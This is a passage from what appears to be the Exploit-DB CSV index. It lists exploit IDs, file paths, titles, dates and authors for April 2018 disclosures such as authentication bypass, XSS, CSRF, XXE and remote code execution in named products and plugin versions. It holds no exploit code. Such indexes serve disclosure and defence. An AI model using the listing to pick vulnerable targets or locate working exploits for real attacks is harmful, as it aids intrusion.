44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,
44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80
44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux,
44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,

Can't render this file because it is too large.